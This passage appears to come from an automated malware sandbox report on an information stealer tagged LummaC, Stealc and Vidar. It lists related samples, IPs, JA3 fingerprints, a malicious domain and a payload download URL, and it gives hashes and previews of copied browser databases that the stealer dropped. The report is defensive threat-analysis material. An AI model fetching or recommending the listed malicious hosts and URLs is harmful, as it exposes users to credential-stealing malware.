	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	45.132.206.251
mysterisop.site	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.21.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.195.67
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.21.3
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	172.67.195.67
	file.exe	Get hash	malicious	LummaC	Browse	104.21.21.3

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
CLOUDFLARENETUS	file.exe	Get hash	malicious	RDPWrap Tool	Browse	172.67.74.152
	FA_41_09_2024_.PDF	Get hash	malicious	Unknown	Browse	172.64.152.210
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	104.26.13.205
	po110-11#U3000Order_ROYPOWTECH %100% S51105P-E01 #Uff08#U6700#U65b0#Uff09IMG .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	#U304a#U898b#U7a4d#U308a#U4f9d#U983c.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	zw15EB2406245 Tc ziraat bankasi. referansl#U0131 Emlakpay_323282-_563028621286 .exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	b222.txt.ps1	Get hash	malicious	LummaC	Browse	104.21.16.12
	AMG Cargo Logistic.docx	Get hash	malicious	Unknown	Browse	104.21.78.54
	AMG Cargo Logistic.docx	Get hash	malicious	Unknown	Browse	172.67.216.244
	NhtSITq9Zp.vbs	Get hash	malicious	Remcos	Browse	188.114.96.3
FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	46.8.231.109
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	34.117.59.81
	Passport and card.vbs	Get hash	malicious	Unknown	Browse	34.117.59.81
	Passport.vbs	Get hash	malicious	Unknown	Browse	34.117.59.81
	http://www.aieov.com/setup.exe	Get hash	malicious	Unknown	Browse	34.117.188.166
	OuaJzAFCTk.exe	Get hash	malicious	DCRat	Browse	34.117.59.81
	Electronic_Receipt_ATT0001.htm	Get hash	malicious	Unknown	Browse	34.117.239.71
	0d145776475200f49119bfb3ac7ac4dd4e20fadd0fd7b.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	34.117.59.81
	https://en.softonic.com	Get hash	malicious	Unknown	Browse	34.117.239.71
	https://ole798.com/	Get hash	malicious	Unknown	Browse	34.117.77.79
	https://www.iphone.trustefy.org/	Get hash	malicious	Unknown	Browse	34.117.77.79
HETZNER-ASDE	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	http://detection.fyi	Get hash	malicious	NetSupport RAT, Lsass Dumper, Mimikatz, Nukesped, Quasar, Trickbot, Xmrig	Browse	135.181.83.222
	OXrZ6fj4Hq.exe	Get hash	malicious	Neshta, Oski Stealer, StormKitty, SugarDump, Vidar, XWorm	Browse	95.216.117.204
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	Pedido09669281099195.com.exe	Get hash	malicious	DarkTortilla, Quasar	Browse	195.201.57.90
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	SecuriteInfo.com.Win32.Evo-gen.9961.31304.exe	Get hash	malicious	Unknown	Browse	188.40.187.174
	SecuriteInfo.com.Win32.Evo-gen.9961.31304.exe	Get hash	malicious	Unknown	Browse	188.40.187.174
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	file.exe	Get hash	malicious	RDPWrap Tool	Browse	104.21.54.163
	file.exe	Get hash	malicious	RDPWrap Tool	Browse	104.21.54.163
	PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	104.21.54.163
	404.exe	Get hash	malicious	Unknown	Browse	104.21.54.163
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.54.163
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.54.163
	Scan_doc_09_16_24_1203.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.54.163
	E_BILL0041272508.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.54.163
	Scan_doc_09_16_24_1120.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.54.163
	E_BILL9926378035.exe	Get hash	malicious	ScreenConnect Tool	Browse	104.21.54.163
a0e9f5d64349fb13191bc781f81f42e1	FA_41_09_2024_.PDF	Get hash	malicious	Unknown	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	b222.txt.ps1	Get hash	malicious	LummaC	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	AMG Cargo Logistic.docx	Get hash	malicious	Unknown	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	file.exe	Get hash	malicious	SmokeLoader	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	Google_Chrome.exe	Get hash	malicious	LummaC	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	https://finalstepgetshere.com/uploads/beta111.zip	Get hash	malicious	LummaC, Go Injector, LummaC Stealer	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.21.17.174 34.117.59.81 172.67.195.67 104.21.56.150 104.26.2.46 104.21.84.18 104.21.18.193 104.237.62.213 188.114.96.3 172.67.208.141 104.102.49.254 104.21.16.12
51c64c77e60f3980eea90869b68c58a8	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	6JA2YPtbeB.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	hTR7xY0d0V.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	N83LFtMTUS.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	49.12.197.9
	5FF7.dll.dll	Get hash	malicious	Unknown	Browse	49.12.197.9
	5FF7.dll.dll	Get hash	malicious	Unknown	Browse	49.12.197.9
	file.exe	Get hash	malicious	Clipboard Hijacker, Vidar	Browse	49.12.197.9
37f463bf4616ecd445d4a1937da06e19	PERMINTAAN ANGGARAN (Universitas IPB) ID177888#U00b7pdf.vbs	Get hash	malicious	GuLoader, Lokibot	Browse	104.102.49.254
	AMG Cargo Logistic.docx	Get hash	malicious	Unknown	Browse	104.102.49.254
	Cn3E2Kp2LP.exe	Get hash	malicious	CobaltStrike	Browse	104.102.49.254
	Cn3E2Kp2LP.exe	Get hash	malicious	CobaltStrike	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	setup.ic19.exe	Get hash	malicious	GhostRat, Nitol	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254
	Enclosed_PO4376630092024_Request_Specifications_Drawings_jpg.exe	Get hash	malicious	Remcos, GuLoader	Browse	104.102.49.254
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse	104.102.49.254

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\ProgramData\CBFIIEHJDB.exe	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
C:\ProgramData\GHDHDBAECG.exe	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse
	file.exe	Get hash	malicious	LummaC, Stealc, Vidar	Browse

Created / dropped Files

C:\ProgramData\AFBKKFBAEGDH\CAEBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFBKKFBAEGDH\JKKKJJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFHDBGHJ

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
SHA-512:	5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
Malicious:	false
Preview:	SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\AFIDGDBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\AFHDBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	40960
Entropy (8bit):	0.8553638852307782
Encrypted:	false
SSDEEP:	48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
MD5:	28222628A3465C5F0D4B28F70F97F482
SHA1:	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
SHA-256:	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
SHA-512:	C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\BKEHDG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\BKKJKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	98304
Entropy (8bit):	0.08235737944063153
Encrypted:	false
SSDEEP:	12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
MD5:	369B6DD66F1CAD49D0952C40FEB9AD41
SHA1:	D05B2DE29433FB113EC4C558FF33087ED7481DD4
SHA-256:	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
SHA-512:	771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\BKKJKF-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\CAAKKF

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.8180424350137764
Encrypted:	false
SSDEEP:	96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
MD5:	349E6EB110E34A08924D92F6B334801D
SHA1:	BDFB289DAFF51890CC71697B6322AA4B35EC9169
SHA-256:	C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
SHA-512:	2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\CBFIIE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\DAFBGH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	ASCII text, with very long lines (1809), with CRLF line terminators
Category:	dropped
Size (bytes):	9571
Entropy (8bit):	5.536643647658967
Encrypted:	false
SSDEEP:	192:qnaRt+YbBp6ihj4qyaaX86KKkfGNBw8DJSl:yegqumcwQ0
MD5:	5D8E5D85E880FB2D153275FCBE9DA6E5
SHA1:	72332A8A92B77A8B1E3AA00893D73FC2704B0D13
SHA-256:	50490DC0D0A953FA7D5E06105FE9676CDB9B49C399688068541B19DD911B90F9
SHA-512:	57441B4CCBA58F557E08AAA0918D1F9AC36D0AF6F6EB3D3C561DA7953ED156E89857FFB829305F65D220AE1075BC825F131D732B589B5844C82CA90B53AAF4EE
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "57f16a19-e119-4073-bf01-28f88011f783");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696333830);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696333856);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\ProgramData\BKFCAFCFBAEH\HDAKJD

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 39, cookie 0x20, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	159744
Entropy (8bit):	0.7873599747470391
Encrypted:	false
SSDEEP:	96:pn6pld6px0c2EDKFm5wTmN8ewmdaDKFmJ4ee7vuejzH+bF+UIYysX0IxQzh/tsVL:8Ys3QMmRtH+bF+UI3iN0RSV0k3qLyj9v
MD5:	6A6BAD38068B0F6F2CADC6464C4FE8F0
SHA1:	4E3B235898D8E900548613DDB6EA59CDA5EB4E68
SHA-256:	0998615B274171FC74AAB4E70FD355AF513186B74A4EB07AAA883782E6497982
SHA-512:	BFE41E5AB5851C92308A097FE9DA4F215875AC2C7D7A483B066585071EE6086B5A7BE6D80CEC18027A3B88AA5C0A477730B22A41406A6AB344FCD9C659B9CB0A
Malicious:	false
Preview:	SQLite format 3......@ .......'........... ......................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\IDAAKE

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, file counter 2, database pages 31, cookie 0x18, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	126976
Entropy (8bit):	0.47147045728725767
Encrypted:	false
SSDEEP:	96:/WU+bDoYysX0uhnyTpvVjN9DLjGQLBE3u:/l+bDo3irhnyTpvVj3XBBE3u
MD5:	A2D1F4CF66465F9F0CAC61C4A95C7EDE
SHA1:	BA6A845E247B221AAEC96C4213E1FD3744B10A27
SHA-256:	B510DF8D67E38DCAE51FE97A3924228AD37CF823999FD3BC6BA44CA6535DE8FE
SHA-512:	C571E5125C005EAC0F0B72B5F132AE03783AF8D621BFA32B366B0E8A825EF8F65E33CD330E42BDC722BFA012E3447A7218F05FDD4A5AD855C1CA22DFA2F79838
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\IIJDBG

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	5242880
Entropy (8bit):	0.037963276276857943
Encrypted:	false
SSDEEP:	192:58rJQaXoMXp0VW9FxWZWdgokBQNba9D3DO/JxW/QHI:58r54w0VW3xWZWdOBQFal3dQ
MD5:	C0FDF21AE11A6D1FA1201D502614B622
SHA1:	11724034A1CC915B061316A96E79E9DA6A00ADE8
SHA-256:	FD4EB46C81D27A9B3669C0D249DF5CE2B49E5F37B42F917CA38AB8831121ADAC
SHA-512:	A6147C196B033725018C7F28C1E75E20C2113A0C6D8172F5EABCB8FF334EA6CE10B758FFD1D22D50B4DB5A0A21BCC15294AC44E94D973F7A3EB9F8558F31769B
Malicious:	false
Preview:	SQLite format 3......@ ...................&...................K..................................j.....-a>.~...\|0{dz.z.z"y.y3x.xKw.v.u.uGt.t;sAs.q.p.q.p{o.ohn.nem.n,m9l.k.lPj.j.h.h.g.d.c.c6b.b.a.a>..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\IIJDBG-shm

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	data
Category:	dropped
Size (bytes):	32768
Entropy (8bit):	0.017262956703125623
Encrypted:	false
SSDEEP:	3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
MD5:	B7C14EC6110FA820CA6B65F5AEC85911
SHA1:	608EEB7488042453C9CA40F7E1398FC1A270F3F4
SHA-256:	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
SHA-512:	D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
Malicious:	false
Preview:	..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\BKFCAFCFBAEH\IJKKEH

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	106496
Entropy (8bit):	1.1358696453229276
Encrypted:	false
SSDEEP:	192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
MD5:	28591AA4E12D1C4FC761BE7C0A468622
SHA1:	BC4968A84C19377D05A8BB3F208FBFAC49F4820B
SHA-256:	51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
